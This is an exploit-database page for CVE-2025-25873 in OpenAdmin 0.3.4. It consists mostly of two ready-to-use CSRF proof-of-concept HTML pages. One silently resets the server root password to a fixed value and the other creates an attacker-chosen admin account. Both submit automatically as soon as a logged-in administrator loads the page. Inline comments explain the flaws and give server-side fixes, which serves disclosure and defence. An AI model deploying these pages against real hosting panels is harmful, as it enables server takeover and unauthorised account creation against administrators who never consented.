## https://sploitus.com/exploit?id=PACKETSTORM:189597
# Exploit Title: OpenAdmin 0.3.4 - Multiple CSRF Vulnerabilities
    # Date: Nov 8, 2024
    # Exploit Author: Punthat Siriwan, Korn Chaisuwan, Manich Koomsusi, Pongtorn Angsuchotmetee 
    # Vendor Homepage: https://openpanel.com/
    # Software Link: https://openpanel.com/
    # Version: 0.3.4
    # Tested on: macOS
    # CVE : CVE-2025-25873
    
    ##-- CSRF at Advanced Change Root Password --##
    <html>
      <body>
        <!--
          Advisory proof of concept for the root-password CSRF reported against
          OpenAdmin 0.3.4. The request below has a single field, "password":
          it carries no anti-CSRF token and no current-password field, so
          nothing in it proves the request came from the panel's own UI.
          NOTE(review): presumably the panel authenticates this POST by the
          admin's session cookie alone; the page does not show the server side.
          Defender note: the fix belongs on the server. Require a per-session
          anti-CSRF token on this endpoint, reject POSTs whose Origin header
          does not match the panel, set SameSite on the session cookie, and ask
          for the current password before changing it.
        -->
        <form action="https://demo.openpanel.org:2087/server/root-password" method="POST">
          <!-- &#64; is the character reference for "@", so the submitted value is P@ssw0rd. -->
          <input type="hidden" name="password" value="P&#64;ssw0rd" />
          <!-- Manual fallback only; the script below submits without a click. -->
          <input type="submit" value="Submit request" />
        </form>
        <script>
          // Rewrites the path shown for this page to "/" without navigating.
          history.pushState('', '', '/');
          // Submits the first form on the page as soon as the script runs,
          // so the request needs no user interaction beyond loading the page.
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    ##-- CSRF at Users --##
    <html> 
      <body> 
        <!--
          Advisory proof of concept for the user-creation CSRF reported against
          OpenAdmin 0.3.4. The request posts four fields (admin_email,
          plan_name, admin_username, admin_password) as multipart/form-data and
          carries no anti-CSRF token. A plain HTML form can send this encoding,
          so a CORS policy alone does not stop it.
          NOTE(review): presumably the panel authenticates this POST by the
          admin's session cookie alone; the page does not show the server side.
          Defender note: require a per-session anti-CSRF token on this endpoint,
          reject POSTs whose Origin header does not match the panel, and set
          SameSite on the session cookie. Where request logs record Origin,
          account-creation requests from a foreign origin are worth alerting on.
        -->
        <form action="https://demo.openpanel.org:2087/user/new" method="POST" 
    enctype="multipart/form-data"> 
          <!-- &#95; is the character reference for "_" and &#64; for "@" in the names and values below. -->
          <input type="hidden" name="admin&#95;email" value="csrf&#64;csrf" /> 
          <input type="hidden" name="plan&#95;name" 
    value="ubuntu&#95;nginx&#95;mysql" /> 
          <input type="hidden" name="admin&#95;username" value="csrf" /> 
          <input type="hidden" name="admin&#95;password" value="12345678" /> 
          <!-- Manual fallback only; the script below submits without a click. -->
          <input type="submit" value="Submit request" /> 
        </form> 
        <script> 
          // Rewrites the path shown for this page to "/" without navigating.
          history.pushState('', '', '/'); 
          // Submits the first form on the page as soon as the script runs,
          // so the request needs no user interaction beyond loading the page.
          document.forms[0].submit(); 
        </script> 
      </body>
    </html>